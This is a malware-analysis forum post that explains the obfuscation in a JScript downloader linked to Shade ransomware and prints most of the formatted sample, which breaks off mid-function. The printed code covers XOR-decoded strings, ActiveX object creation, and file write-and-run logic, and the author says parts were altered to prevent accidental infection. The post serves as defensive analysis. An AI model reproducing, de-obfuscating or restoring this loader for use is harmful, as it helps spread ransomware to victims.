Malware Analysis ¦¬¦-¦+¦-¦¬¦¦¦¦¦-¦-¦-TБTВTМ_23xls.js - big puzzle familly - updated with Jan,14 2017 version

[DardiM]

EDITED Jan,14 2017
last post :
¦¬¦-¦+¦-¦¬¦¦¦¦¦-¦-¦-TБTВTМ_23xls.js

https://malwaretips.com/threads/¦¬¦...d-with-jan-14-2017-version.65957/#post-587721​

----------------------------------------------------------------------------------​

From https://malwaretips.com/threads/23-11-2016-20.65760/
Thanks to @XIII

Документы и декларация на товар 11222016.js
(Payload : shade ransomware : extension .NO_MORE_RANSOM)​

From https://malwaretips.com/threads/28-11-2016-20.65943/
Thanks to Der.Reisende

начисления_xls.js​

Why these samples ?

Because these are very big puzzle.

=> Only read it if you like long puzzle games

I will not explain the JS functions in details, considering the reader has already, at least, basic knowledge in JScript / JavaScript.​

Just read the spoiler :

Spoiler: details

Just remember :

object.method(parameter)

​

object :

​

an object (ActiveX or another)
​

.method

​

dot followed by the method to be call (it is the name of a function of the object : method)
​

(parameter)

​

it can be one, two, etc, parameter(s) that will be (or not) used in the method (=function) : separated by a "," (without quotes)

​

can be written:

​

object["method"](parameter)
​

and then with obfuscated data :

zeze[ezez()](fdsfsf)​

Example :

var a = zeze[ezez()](fdsfsf)

and looking at the code

zeze = "abcd";
ezez() a function that returns "charAt"
fdsfsf = 0;

​

=> var a = "abcd"["charAt"](0)

that can be written :

"abcd".charAt(0)

​

=> calls the charAt method (=function) of String object ("abcd" is a string )
=> retrieves the char At position given by the parameter : 0

= var = "a"; (because position begins by 0 and not 1)​

I have put some spoiler parts, to avoid "eyes destruction".

I will take as example Документы и декларация на товар 11222016.js
The both sample use similar obfuscation (but all the parts are not the same)

1) What it looks like :

A very long list of functions, some that call other(s) function(s)

Examples :

- Some basic functions, where only the return value is important

Some basic functions returns a char, other part are useless

function tw() {
    var Kq = 46619;
    return "x";
}

function A() {
    var lG = 10035;
    return "S";
}
function FV()
{
    var QWn=59633;
    return eval("String.fromCharCode(409-298)");

           => String.fromCharCode(111)
           => "o"
 
}

Some functions call other functions, other parts are useless

function Wed() {
    var Amg = 47318;
    var b = ")V5r_nuqh";
    return A();

{
var u=2654;
    return ih()+l();
}

function aU()
{
    var VF=1094;
    var SE="sG;=)%Q)LE";
    return WgE();
}

- Some functions are more elaborated :

all parts are important, and obfuscates

function J(DK)
{
    var Kk=842271;
    var IJ=Kk+44517;
    var q=IJ/918;
    var a=q-965;

                 => here : var a=1

    var Qk = eval(Mr() + (DK+a) + aKq());

    return Qk;
}

function HyA(WtD)
{
    var XkX = lw();
    var cW = Do();
    var md = St();
    XkX = XkX + dka() + cW + ymC() + md;
    var ddh = WtD[XkX];
    return ddh;
}

- Some functions are main functions that do all the job.

=> We will see them in detail, later

As usual, I have changed some parts in the SPOILER to avoid copy-paste => save => run => infection

Spoiler: The whole sample - formatted

function tw() {
    var Kq = 46619;
    return "x";
}

function A() {
    var lG = 10035;
    return "S";
}

function Wed() {
    var Amg = 47318;
    var b = ")V5r_nuqh";
    return A();
}

function Zgm() {
    var Bpq = 43044;
    return "J";
}

function pT() {
    var Ow = 26898;
    return "t";
}

function ye() {
    var MD = 5179;
    var ZG = "LZA5Ui#>Y";
    return pT();
}

function sm() {
    var iDQ = 47758;
    return Wed() + ye();
}

function d() {
    var PzD = 10270;
    return "_";
}

function j() {
    var Cra = 3733;
    return "r";
}

function QTN() {
    var fZ = 63455;
    var oI = "K0*)2zOb";
    return j();
}

function ih() {
    var T = 3878;
    return eval("String.fromCharCode(6+99)");
}

function l() {
    var XLg = 58279;
    return eval("String.fromCharCode(3+107)");
}

function xcT() {
    var u = 2654;
    return ih() + l();
}

function kd() {
    var aZB = 24017;
    return QTN() + xcT();
}

function s() {
    var F = 25788;
    return sm() + kd();
}

function pe() {
    var Fok = 16103;
    return eval("String.fromCharCode(5871/57+0)");
}

function Glt() {
    var o = 57632;
    return eval("String.fromCharCode(19+27)");
}

function sd() {
    var bO = 19250;
    return pe() + Glt();
}

function haG() {
    var bc = 31246;
    return eval("String.fromCharCode(249-147)");
}

function gcy() {
    var eS = 48179;
    return "g";
}

function eYh() {
    var Ef = 101;
    return "r";
}

function OfW() {
    var KUy = 6617;
    var g = "-D3HC=";
    return eYh();
}

function eH() {
    var Ki = 31783;
    return "o";
}

function yn() {
    var gdW = 1672;
    return "&";
}

function Pv() {
    var UN = 32594;
    var TWI = "=lLxig";
    return eH();
}

function Whd() {
    var iGy = 55910;
    return OfW() + Pv();
}

function yVO() {
    var blE = 58449;
    return haG() + Whd();
}

function ryJ() {
    var WO = 44821;
    return sd() + yVO();
}

function iW() {
    var ljJ = 51757;
    return s() + ryJ();
}

function TR() {
    var QU = 24221;
    return "m";
}

function Pif() {
    var ofO = 37564;
    return "i";
}

function rPV() {
    var RqL = 5563;
    var X = "K)C6f1qC";
    return TR();
}

function us() {
    var erg = 39100;
    return eval("String.fromCharCode(67)");
}

function M() {
    var JY = 17872;
    return rPV() + us();
}

function jR() {
    var IA = 56634;
    return eval("String.fromCharCode(94+10)");
}

function WgE() {
    var ej = 26631;
    return "a";
}

function ROc() {
    var L = 30021;
    return "J";
}

function aU() {
    var VF = 1094;
    var SE = "sG;=)%Q)LE";
    return WgE();
}

function dad() {
    var um = 3812;
    return eval("String.fromCharCode(865-751)");
}

function E() {
    var bA = 11630;
    return aU() + dad();
}

function Z() {
    var zXZ = 13325;
    return jR() + E();
}

function NT() {
    var tY = 14724;
    return M() + Z();
}

function UjL() {
    var m = 61281;
    return "E";
}

function H() {
    var vC = 35509;
    return "C";
}

function GhP() {
    var dT = 6557;
    var CgG = ")Uwd:%S";
    return H();
}

function FV() {
    var QWn = 59633;
    return eval("String.fromCharCode(409-298)");
}

function jq() {
    var IsO = 11335;
    return GhP() + FV();
}

function OTU() {
    var f = 52470;
    return eval("String.fromCharCode(24+76)");
}

function kx() {
    var yk = 65417;
    return eval("String.fromCharCode(60+41)");
}

function ed() {
    var dk = 2951;
    return "3";
}

function wDH() {
    var zu = 4217;
    return "(";
}

function N() {
    var awp = 17163;
    var GHg = "T!_4dI@TWWK";
    return wDH();
}

function vff() {
    var V = 4234;
    return kx() + N();
}

function e() {
    var Lu = 60064;
    return OTU() + vff();
}

function id() {
    var B = 9324;
    return jq() + e();
}

function adq() {
    var Dk = 32154;
    return NT() + id();
}

function Mr() {
    var k = 4925;
    return iW() + adq();
}

function aKq() {
    var CrA = 55261;
    return eval("String.fromCharCode(262-221)");
}

function J(DK) {
    var Kk = 842271;
    var IJ = Kk + 44517;
    var q = IJ / 918;
    var a = q - 965;
    var Qk = eval(Mr() + (DK + a) + aKq());

    return Qk;
}

function Jr() {
    var nf = 64046;
    return "Y";
}

function Oju() {
    var nW = 10830;
    return "l";
}

function GoL() {
    var yK = 30267;
    var Tf = "Gnu3oc";
    return Oju();
}

function ZYk() {
    var fc = 1013;
    return "P";
}

function Ca() {
    var Gbc = 23646;
    return "e";
}

function WAF() {
    var XJQ = 8710;
    var vl = "otuZtnWF&Qi";
    return Ca();
}

function lw() {
    var p = 57451;
    return GoL() + WAF();
}

function EGQ() {
    return J(957 - 848);
}

function wYY() {
    return J(6 * 17);
}

function Do() {
    var DI = 13740;
    return EGQ() + wYY();
}

function CX() {
    var pBj = 43338;
    return "r";
}

function wx() {
    var LyB = 25334;
    return "t";
}

function SAy() {
    var EQl = 7716;
    var VO = "E02PGP";
    return wx();
}

function qBu() {
    var db = 26120;
    return "h";
}

function Hft() {
    var tah = 4205;
    return "!";
}

function t() {
    var JQv = 51698;
    var vy = "!bTQKmCT<a";
    return qBu();
}

function St() {
    var PXb = 36011;
    return SAy() + t();
}

function dka() {
    var hZd = "";
    hZd = hZd;
    return hZd;
}

function ymC() {
    var lDE = "";
    lDE = lDE;
    return lDE;
}

function HyA(WtD) {
    var XkX = lw();
    var cW = Do();
    var md = St();
    XkX = XkX + dka() + cW + ymC() + md;
    var ddh = WtD[XkX];
    return ddh;
}

function QtJ() {
    var DZQ = 3368;
    return "y";
}

function Hjz() {
    var ERX = 63067;
    return "A";
}

function bYp() {
    var dkY = 21709;
    var XQb = "wpGvNSb;bVL";
    return Hjz();
}

function xEQ() {
    var fq = 50513;
    return "D";
}

function Cg() {
    var DEN = 57041;
    return "B";
}

function lP() {
    var mYV = 28465;
    var tYs = "Q1^4h;Tz";
    return xEQ();
}

function SuU() {
    return J(4 + 74);
}

function MN() {
    var Bz = 18406;
    return lP() + SuU();
}

function I() {
    var dJH = 18172;
    return bYp() + MN();
}

function xzm() {
    return J(67);
}

function qw() {
    var Ap = 9051;
    return "B";
}

function XSr() {
    var Ky = 22421;
    return "v";
}

function Q() {
    var pB = 34207;
    var fDk = "#)b>dixAY";
    return qw();
}

function jrF() {
    return J(2385 / 53 - 0);
}

function Be() {
    var CM = 56871;
    return Q() + jrF();
}

function TwY() {
    var W = 61512;
    return xzm() + Be();
}

function XOA() {
    var NRA = 53614;
    return I() + TwY();
}

function rbT() {
    return J(70 + 12);
}

function POQ() {
    return J(6785 / 59 - 0);
}

function dt() {
    var yi = 60732;
    return "E";
}

function Rw() {
    var LPO = 23444;
    return "r";
}

function nL() {
    var PTl = 57087;
    var TgY = "g3v73oI<";
    return Rw();
}

function mVZ() {
    var iv = 2780;
    return POQ() + nL();
}

function wG() {
    var lJx = 30138;
    return rbT() + mVZ();
}

function NG() {
    var wOg = 43521;
    return "f";
}

function mXR() {
    var tD = 51744;
    return "e";
}

function Fxm() {
    var v = 37889;
    var rrJ = "pfl!,4YlCv^a";
    return mXR();
}

function ocz() {
    var RNH = 39641;
    return "$";
}

function xT() {
    var ZL = 18048;
    return "a";
}

function RA() {
    var cfV = 30870;
    var yYJ = "h050<SO$-y";
    return xT();
}

function Ws() {
    return J(36 * 3);
}

function NL() {
    var Jv = 29491;
    return RA() + Ws();
}

function gR() {
    var Mu = 32934;
    return Fxm() + NL();
}

function yUo() {
    var OO = 51481;
    return wG() + gR();
}

function oh() {
    var h = 21632;
    return XOA() + yUo();
}

function vq() {
    return J(35 + 31);
}

function Hk() {
    return J(302 - 195);
}

function YA() {
    var Tt = 28880;
    return vq() + Hk();
}

function cp() {
    var xG = 8827;
    return "*";
}

function VNo() {
    var CLX = 45617;
    return "o";
}

function BP() {
    var PH = 10084;
    var px = "b6.j2WspcPY(";
    return VNo();
}

function sI() {
    return J(6 * 19);
}

function uKr() {
    return J(348 - 248);
}

function VUd() {
    var qGQ = 31313;
    return sI() + uKr();
}

function Imt() {
    var Iyc = 63845;
    return BP() + VUd();
}

function CWZ() {
    var szi = 27704;
    return YA() + Imt();
}

function bxE() {
    return J(920 - 841);
}

function ajz() {
    var lE = 49080;
    return "l";
}

function JP() {
    var lu = 43416;
    return "o";
}

function gt() {
    var OXk = 236;
    var hMS = "j<L>!fm%e";
    return JP();
}

function rJi() {
    var dv = 3412;
    return bxE() + gt();
}

function YAs() {
    return J(6 * 19);
}

function ELA() {
    return J(8 + 96);
}

function Hbn() {
    var r = 36669;
    return YAs() + ELA();
}

function sC() {
    var On = 39813;
    return rJi() + Hbn();
}

function BZ() {
    var qK = 51395;
    return "t";
}

function w() {
    var YAd = 17952;
    return "s";
}

function zs() {
    var VDU = 22173;
    var hoA = "n6(!zrO29";
    return BZ();
}

function kL() {
    return J(835 - 731);
}

function bh() {
    var toA = 43781;
    return zs() + kL();
}

function uf() {
    return J(2860 / 26 + 0);
}

function GP() {
    var gF = 39081;
    return "3";
}

function toJ() {
    var NO = 39621;
    return "n";
}

function hh() {
    var lfB = 7505;
    var FVS = "!n!!&.&qYCUh";
    return toJ();
}

function Jm() {
    var cT = 50098;
    return uf() + hh();
}

function C() {
    var wcG = 33691;
    return bh() + Jm();
}

function tDk() {
    var AKC = 30304;
    return sC() + C();
}

function qdI(jp) {
    var Uh = eval("ActiveXObject");
    var Rl = new Uh(oh());
    var WuR = "";
    WuR = WuR + J(551 - 435) + J(109) + J(161 - 55) + J(418 - 309) + J(10 * 11) + J(1043 - 925) + J(229 - 120);
    var XkB = WuR;
    var oQ = (typeof Rl[CWZ()] == XkB);
    if (!oQ) return oQ;
    oQ = (typeof Rl[tDk()] == XkB);

    return oQ;
}

function Hd(tG, yRI) {
    var XEE = 72822;
    var uxo = XEE + 58878;
    var kc = uxo / 300;
    var JiT = kc - 438;
    var HkD = JiT;
    var gcq = 102714;
    var TQ = gcq + 26334;
    var oq = TQ / 228;
    var rP = oq - 566;
    var Sb = rP;
    var YCE = 120043;
    var PbA = YCE + 27693;
    var SKR = PbA / 313;
    var oX = SKR - 465;
    var iuV = oX;
    var EXT = "";
    EXT = EXT + J(74 + 37) + J(32 * 3) + J(7232 / 64 + 0) + J(6 * 19) + J(94 + 6) + J(557 - 485) + J(109) + J(20 + 95);
    var BAK = EXT;
    var sbG = "";
    sbG = sbG + J(5488 / 56 + 0) + J(612 - 509) + J(32 * 3) + J(423 - 310) + J(35 + 29) + J(99 + 16);
    var UAR = sbG;

    if (Math.cos(HkD) > Sb)
        iuV = eval(BAK);
    else
        iuV = eval(UAR);

    if (Math.sin(HkD) > Sb) {
        var TA = iuV(tG, yRI);
        return TA;
    } else
        return HkD;
}

function PgR() {
    var yQ = 516582;
    var bb = yQ + 8898;
    var jUh = bb / 755;
    var XUW = jUh - 696;
    return 0 + XUW;
}

function pXY() {
    var Bi = "";
    Bi = Bi;
    return Bi;
}

function TG() {
    var jE = 752491;
    var qDB = jE + 54701;
    var JLj = qDB / 808;
    var ZvU = JLj - 999;
    return ZvU + 0;
}

function Bv() {
    var Wx = 32391;
    var ept = Wx + 1427;
    var jU = ept / 914;
    var wBY = jU - 35;
    return 0 + wBY;
}

function aW() {
    var GR = "";
    GR = GR + J(30 + 68) + J(103) + J(2976 / 31 + 0) + J(276 - 163) + J(154 - 90) + J(5 * 23);
    return GR;
}

function Hb() {
    var CzR = 208985;
    var gp = CzR + 57754;
    var xoD = gp / 411;
    var ZD = xoD - 648;
    return 0 + ZD;
}

function Ua() {
    var dSE = "";
    dSE = dSE + J(14 * 7) + J(103) + J(44 + 52) + J(60 + 53) + J(256 - 192) + J(94 + 21);
    return dSE;
}

function GuV() {
    var QHj = 469118;
    var mE = QHj + 16324;
    var riR = mE / 543;
    var HPx = riR - 893;
    return 0 + HPx;
}

function vOX() {
    var qIJ = 87393;
    var ll = qIJ + 7077;
    var hKF = ll / 201;
    var hMF = hKF - 454;
    return hMF + 0;
}

function nsV() {
    var tTu = "";
    tTu = tTu + J(82 + 16) + J(103) + J(4992 / 52 - 0) + J(15 + 98) + J(6 * 11) + J(3630 / 33 + 0) + J(8019 / 81 + 0) + J(20 * 5) + J(62 + 2) + J(60 + 55);
    return tTu;
}

function uQR() {
    var AET = "";
    AET = AET + J(218 - 117) + J(22 + 91) + J(96 + 14) + J(666 - 558) + J(36 + 30) + J(3502 / 34 + 0) + J(32 * 3) + J(10283 / 91 + 0) + J(6 * 11) + J(7810 / 71 - 0) + J(3663 / 37 + 0) + J(81 + 19);
    return AET;
}

function te() {
    var oOV = "";
    oOV = oOV;
    return oOV;
}

function QRO(eQZ, AV) {
    var QJ = HyA(eQZ);
    var DIL = PgR();
    var Hm = HyA(AV);
    var Tv = [pXY()][TG()];
    while (DIL < QJ) {
        var un = DIL / Bv();
        var nH = eQZ[aW()](DIL);
        DIL = DIL + Hb();
        nH = nH + eQZ[Ua()](DIL);
        DIL = DIL + GuV();
        var gD = Hd(nH, vOX());
        var Km = AV[nsV()](un % Hm);
        var WY = gD ^ Km;
        var Qk = String[uQR()](WY);
        Tv = Tv + te() + Qk;
    }
    return Tv;
}

function VNB(AK) {
    var kO = 118956;
    var ApS = kO + 55044;
    var ELV = ApS / 580;
    var htB = ELV - 172;
    var LPh = htB;
    var UuE = "";
    UuE = UuE + J(109) + J(1650 / 15 - 0) + J(5 * 23);
    var xw = UuE;
    try {
        var ux = "";
        ux = ux + J(7 * 13);
        var KUe = "";
        KUe = KUe + J(10 * 7) + J(419 - 319) + J(5 * 23) + J(684 - 601) + J(20 * 5) + J(657 - 549) + J(321 - 210) + J(784 - 707) + J(32 * 3) + J(6480 / 60 - 0) + J(1500 / 15 + 0);
        xw = ux + AK[KUe]();
        var xZz = "";
        xZz = xZz + J(452 - 354) + J(284 - 181) + J(32 * 3) + J(97 + 16) + J(1408 / 22 - 0) + J(5 * 23);
        var Pz = 660305;
        var Rlj = Pz + 62830;
        var pgJ = Rlj / 679;
        var eSw = pgJ - 809;
        xw = xw + LPh[xZz](eSw);
        var Yv = "";
        Yv = Yv + J(136 / 2 - 0) + J(716 - 618) + J(63 + 40) + J(577 - 467);
        var VUK = [];
        VUK[0] = "d3";
        VUK[1] = "dah";
        VUK[2] = "s";
        VUK[3] = "h";
        VUK[4] = "663";
        VUK[5] = "asg";
        VUK[6] = "g";
        VUK[7] = "dh";
        var Sq = VUK[7] + VUK[5] + VUK[3] + VUK[0] + VUK[4] + VUK[6] + VUK[1] + VUK[2];
        WScript[Yv](Sq);
    } catch (Ms) {
        var rd = "";
        rd = rd + J(742 - 676) + J(271 - 158) + J(16 + 84) + J(82 + 14) + J(75 + 40) + J(3800 / 38 - 0) + J(67 + 11) + J(8 + 89) + J(15 * 7) + J(539 - 439) + J(392 / 4 + 0) + J(4600 / 40 + 0);
        var rOs = "";
        rOs = rOs + J(40 + 46) + J(4 + 78) + J(9310 / 95 - 0) + J(495 - 382) + J(70 + 34) + J(3 * 37) + J(34 + 81) + J(9 * 5) + J(64 + 13) + J(48 + 52) + J(5 * 23) + J(59 * 2) + J(143 - 33) + J(2034 / 18 - 0) + J(954 / 9 - 0);
        var OxT = WScript[rd](rOs);
        var CFm = "";
        CFm = CFm + J(12 * 7) + J(3192 / 28 + 0) + J(33 + 67) + J(683 - 570) + J(65 + 2) + J(27 + 83) + J(9396 / 87 + 0) + J(3648 / 38 - 0) + J(446 - 342) + J(109);
        var Wl = typeof OxT[CFm];
        var uL = "";
        uL = uL + J(860 - 746) + J(2530 / 22 + 0) + J(113) + J(8 * 13) + J(109) + J(9384 / 92 - 0);
        var KDf = uL;
        if (Wl == KDf) {
            var rC = 55817;
            var EZO = rC + 11587;
            var BN = EZO / 82;
            var SC = BN - 819;
            var JeR = SC;
            var kP = "";
            kP = kP + J(747 - 677) + J(8700 / 87 - 0) + J(5 * 23) + J(41 * 2) + J(837 - 726) + J(20 * 5) + J(14 * 7) + J(5720 / 55 + 0) + J(32 * 3) + J(107) + J(759 / 11 - 0) + J(102 + 8) + J(94 + 13) + J(2 + 97) + J(20 * 5) + J(113);
            var acD = 607;
            var lru = acD + 3401;
            var NK = lru / 4;
            var IW = NK - 1000;
            xw = AK[kP](IW) + xw;
        } else {
            var gA = 472398;
            var nh = gA + 23328;
            var dU = nh / 518;
            var rkq = dU - 947;
            var JeR = rkq;
            var CU = [];
            CU[0] = "S";
            CU[1] = "pec";
            CU[2] = "Get";
            CU[3] = "e";
            CU[4] = "r";
            CU[5] = "F";
            CU[6] = "old";
            CU[7] = "ial";
            var di = CU[2] + CU[0] + CU[1] + CU[7] + CU[5] + CU[6] + CU[3] + CU[4];
            var bDo = 254595;
            var hxj = bDo + 51425;
            var IkN = hxj / 535;
            var fg = IkN - 571;
            xw = AK[di](fg) + xw;
        }
    }
    return xw;
}


function JK(rch, LAe, tC, xnW) {
    var xUj = 85687;
    var oEC = xUj + 61733;
    var se = oEC / 364;
    var hP = se - 405;
    var saL = hP;
    if (rch > saL) {
        rch = saL;
    }
    var XJ = QRO("32290802101215242C1D01", "ANlhxsfCDykvurcqjY4RRqr9m5mh5FlojeGYDzFGG37989hSeNYp8K699X6IbQAe945t6BVJfyf74i");
    var GNY = "";
    GNY = GNY + J(810 - 712) + J(25 + 28) + J(9 * 13) + J(7 * 17) + J(3230 / 38 - 0) + J(1073 - 991) + J(16 * 5) + J(8228 / 68 + 0) + J(595 - 493) + J(253 - 149) + J(706 - 655) + J(76 + 33) + J(6180 / 60 - 0) + J(16 * 3) + J(10 * 5) + J(7 + 45) + J(747 - 648) + J(489 - 407) + J(4200 / 42 + 0) + J(7584 / 96 - 0) + J(162 - 113) + J(1 + 64) + J(1060 - 958) + J(40 + 41) + J(239 - 136) + J(45 + 21) + J(1079 - 975) + J(16 * 7) + J(7280 / 70 - 0) + J(7 + 62) + J(63 + 17) + J(101) + J(3744 / 78 - 0) + J(279 - 201) + J(1072 - 972) + J(543 - 461) + J(5253 / 51 - 0) + J(409 - 306) + J(87 - 10) + J(1054 - 939) + J(71) + J(32 + 32) + J(5310 / 45 - 0) + J(20 + 55) + J(823 - 713) + J(866 - 762) + J(637 - 524) + J(5700 / 75 - 0) + J(234 - 164) + J(26 + 27) + J(73) + J(5412 / 66 - 0) + J(29 + 57) + J(634 - 533) + J(3 * 37) + J(47) + J(4250 / 50 + 0) + J(481 - 375) + J(10 * 5) + J(10 * 7) + J(65 + 46) + J(6902 / 58 + 0) + J(7 * 17) + J(632 - 566) + J(3685 / 55 - 0) + J(21 + 35) + J(231 - 164) + J(82 + 27) + J(5106 / 69 + 0) + J(741 - 633) + J(52 + 2);
    XJ = new LAe(QRO("3445150A3F2325543401510204", GNY));
    XJ[xnW](tC, rch);
    var ez = 2842;
    var DDn = ez + 749;
    var gm = DDn / 21;
    var ihg = gm - 163;
    var xw = ihg;
    return xw;
}

function ygJ(ng, LAe, tC, xnW) {
    var JC = "";
    JC = JC + J(4066 / 38 + 0) + J(93 + 7) + J(3488 / 32 + 0) + J(4386 / 43 - 0) + J(5 * 23) + J(94 + 9);
    var iSL = ng[JC];
    var Jnf = 279668;
    var EQQ = Jnf + 15258;
    var HB = EQQ / 478;
    var ubH = HB - 610;
    var dUR = ubH;
    var sDM = 402607;
    var Ko = sDM + 39011;
    var RI = Ko / 827;
    var tU = RI - 529;
    var Nk = tU;
    var CWg = xnW;
    if (iSL == dUR) {
        var iUx = "";
        iUx = iUx + J(416 - 303) + J(774 - 658) + J(6213 / 57 + 0);
        CWg = iUx;
    }
    if (iSL == Nk) {
        var FL = iSL * Nk;
        return JK(FL, LAe, tC, xnW);
    }
    var NW = "";
    NW = NW + J(605 - 491) + J(942 - 826) + J(97) + J(456 / 4 - 0) + J(9775 / 85 - 0) + J(113) + J(7592 / 73 - 0) + J(804 - 695) + J(20 + 82);
    var BY = 250521;
    var FPm = BY + 40485;
    var kA = FPm / 317;
    var pHz = kA - 918;
    var zD = 1065;
    var em = zD + 11871;
    var fx = em / 616;
    var Tk = fx - 20;
    var jXy = ng[NW](pHz, iSL - Tk);
    return ygJ(jXy, LAe, tC, CWg);
}

function WN(gV, Jp, LAe) {
    var TOw = 376387;
    var LH = TOw + 46238;
    var XCe = LH / 735;
    var sM = XCe - 565;
    var DC = sM;

    var Qbv = "";
    Qbv = Qbv + J(605 - 524) + J(89 + 11) + J(960 / 10 + 0) + J(4356 / 44 + 0);
    var Ld = gV[Qbv]();
    var tv = "";
    tv = tv + J(232 - 150) + J(9152 / 88 - 0) + J(728 - 607) + J(898 - 798);
    var Hx = gV[tv];
    var bP = 444811;
    var NUC = bP + 14609;
    var nPH = NUC / 620;
    var NoG = nPH - 540;
    var etf = NoG;
    var rx = "";
    rx = rx + J(832 / 13 - 0) + J(547 - 480) + J(6 * 13) + J(6633 / 99 - 0) + J(5 * 13) + J(6 + 39) + J(1701 / 21 + 0) + J(2000 / 20 + 0) + J(8624 / 88 + 0) + J(10 * 11) + J(88 + 25) + J(9 + 90) + J(44 + 70) + J(7500 / 75 - 0) + J(10120 / 88 - 0);
    var SFa = new LAe(rx);
    var SfA = "";
    SfA = SfA + J(27 + 70) + J(8 * 13) + J(76 + 33);
    var OB = SfA;
    var PbB = "";
    PbB = PbB + J(101) + J(428 - 324) + J(4500 / 45 + 0) + J(107) + J(0 + 99) + J(6 * 19);
    var Yb = "";
    Yb = Yb + J(32 * 3) + J(11100 / 100 + 0) + J(32 + 79) + J(27 + 73) + J(65 + 44) + J(355 - 256);
    SFa[PbB][Yb](OB, etf, Hx);
    var CFg = "";
    CFg = CFg + J(59 + 51) + J(3 * 37) + J(20 * 5) + J(109);
    SFa[CFg]();
    var ZJ = "";
    ZJ = ZJ + J(350 - 254) + J(738 - 639) + J(9 * 11) + J(7 * 11) + J(589 - 489) + J(15 + 103);
    SFa[ZJ]();
    var XmR = "";
    XmR = XmR + J(72 + 24) + J(340 - 229) + J(6882 / 62 - 0) + J(128 - 28) + J(71 + 38) + J(541 - 442) + J(60 + 6) + J(25 + 78) + J(4 * 29) + J(109) + J(53 * 2);
    SFa(OB)[XmR](Ld);
    var BC = "";
    BC = BC + J(72 + 44) + J(757 - 646) + J(8712 / 88 - 0) + J(429 - 333) + J(786 - 671) + J(7400 / 74 - 0);
    SFa[BC]();
    var LvZ = "";
    LvZ = LvZ + J(9 * 13) + J(32 * 3) + J(397 - 290) + J(950 - 834) + J(20 * 5);
    Ld = SFa(OB)[LvZ];
    var wJ = "";
    wJ = wJ + J(214 / 2 - 0) + J(20 * 5) + J(995 - 886) + J(33 + 69) + J(5 * 23) + J(2 + 101);
    var Coz = Ld[wJ];

    if (Coz > DC) {
        var los = "";
        los = los + J(75 + 7) + J(576 / 6 + 0) + J(9 * 13) + J(50 + 50) + J(83) + J(68 + 42) + J(222 - 153) + J(611 - 507) + J(107) + J(302 - 202);
        //gV[los](Jp);
        return true;
    } else return false;
}

function DN(ayd) {
    var wC = new ayd(QRO("144B501D5E32151C2758215D16", "C83o7Ba2t0D1zn3tfqUcMUag2g8hwJlsWgdXjD9rtYWDbxF2uQrnf64sJOKWzGaqgAj8716EyG"));
    return wC;
}

function YjS(GgD) {
    var wC = new GgD(QRO("35232A193A6A6C0107742C333529", "xprTvXBYJ8dgay32zvNLN6fbbvJp1XV6w4U5BuhZ4MyPZyDCytLJ8Ls0WrItDcADtEzeOiEKgUjKGhcs"));
    return wC;
}

function BSu(WZr, Svj) {
    var Xh = [];
    Xh[0] = "M";
    Xh[1] = "9";
    Xh[2] = "fxj";
    Xh[3] = "E";
    Xh[4] = "4";
    Xh[5] = "OZ";
    Xh[6] = "3";
    Xh[7] = "ZE";
    Xh[8] = "9i";
    Xh[9] = "hj";
    Xh[10] = "e0S";
    Xh[11] = "g";
    Xh[12] = "ml";
    Xh[13] = "Ad9";
    Xh[14] = "5X";
    Xh[15] = "J";
    Xh[16] = "U";
    Xh[17] = "rb";
    Xh[18] = "7oZ";
    Xh[19] = "3e";
    Xh[20] = "yr7";
    Xh[21] = "ug";
    Xh[22] = "Ux";
    Xh[23] = "s";
    Xh[24] = "3f2";
    Xh[25] = "s4";
    Xh[26] = "u";
    Xh[27] = "Jj";
    Xh[28] = "noU";
    Xh[29] = "KLh";
    Xh[30] = "lbO";
    Xh[31] = "E";
    Xh[32] = "w";
    Xh[33] = "t";
    Xh[34] = "rJ";
    Xh[35] = "3L";
    Xh[36] = "V";
    Xh[37] = "3g";
    Xh[38] = "5T";
    Xh[39] = "Kn";
    Xh[40] = "m";
    Xh[41] = "1Wl";
    var ms = Xh[22] + Xh[0] + Xh[4] + Xh[19] + Xh[28] + Xh[8] + Xh[10] + Xh[37] + Xh[3] + Xh[38] + Xh[36] + Xh[5] + Xh[27] + Xh[17] + Xh[1] + Xh[35] + Xh[31] + Xh[11] + Xh[20] + Xh[16] + Xh[21] + Xh[26] + Xh[30] + Xh[7] + Xh[2] + Xh[32] + Xh[29] + Xh[12] + Xh[14] + Xh[18] + Xh[34] + Xh[25] + Xh[15] + Xh[40] + Xh[41] + Xh[6] + Xh[9] + Xh[24] + Xh[39] + Xh[13] + Xh[23] + Xh[33];
    var LN = eval(QRO("022B2E465A151A", ms));
    var kQ = LN[QRO("303A085F124D03232E200451065D", "cYz6b9EVBLJ0k8wposUSED3bw02Cp6bI71mjcMnF7UfKxD6eFo6FO0VMpgcaENpyl8U5EdriaX0jZ")];
    var EB = "";
    EB = EB + J(557 - 440) + J(8036 / 98 - 0) + J(6630 / 65 + 0) + J(28 + 70) + J(1 + 55) + J(9752 / 92 - 0) + J(2795 / 43 + 0) + J(49 + 72) + J(38 + 42) + J(26 + 93) + J(757 - 660) + J(10 * 7) + J(73) + J(2 + 52) + J(5184 / 64 - 0) + J(944 - 892) + J(2544 / 48 - 0) + J(79) + J(6783 / 57 + 0) + J(4620 / 70 + 0) + J(10 + 55) + J(7 * 11) + J(324 - 250) + J(1173 / 23 - 0) + J(7 * 17) + J(4 + 100) + J(579 - 478) + J(48 + 16) + J(35 + 65) + J(6351 / 73 - 0) + J(3552 / 37 - 0) + J(420 - 341) + J(852 - 750) + J(35 + 39) + J(6 * 17) + J(15 * 7) + J(213 - 113) + J(7 * 17) + J(3 + 61) + J(109) + J(1024 - 936) + J(37 + 30) + J(8 * 7) + J(10 * 7) + J(6 * 11) + J(83) + J(4 * 19) + J(9 * 11) + J(455 / 7 + 0) + J(21 + 80) + J(65 + 44) + J(90 + 15) + J(78 + 7) + J(4 * 17) + J(109) + J(16 * 3) + J(2 * 37) + J(8 + 70) + J(192 / 2 + 0) + J(76 + 24) + J(1488 / 31 - 0) + J(47) + J(929 - 881) + J(8200 / 100 + 0) + J(21 + 32) + J(6 * 11) + J(8 * 13) + J(73) + J(31 + 74) + J(9630 / 90 + 0) + J(490 - 383);
    //WZr[QRO("12360B064D0E04133D1D",EB)](kQ);
    return true;
}

function jGP(OF, qnI) {
    var mD = [];
    mD[0] = "5o";
    mD[1] = "aL";
    mD[2] = "R";
    mD[3] = "R";
    mD[4] = "b0K";
    mD[5] = "gh";
    mD[6] = "mC";
    mD[7] = "qdn";
    mD[8] = "L9p";
    mD[9] = "A";
    mD[10] = "WKH";
    mD[11] = "Au";
    mD[12] = "yn";
    mD[13] = "7";
    mD[14] = "b";
    mD[15] = "70";
    mD[16] = "eW";
    mD[17] = "e75";
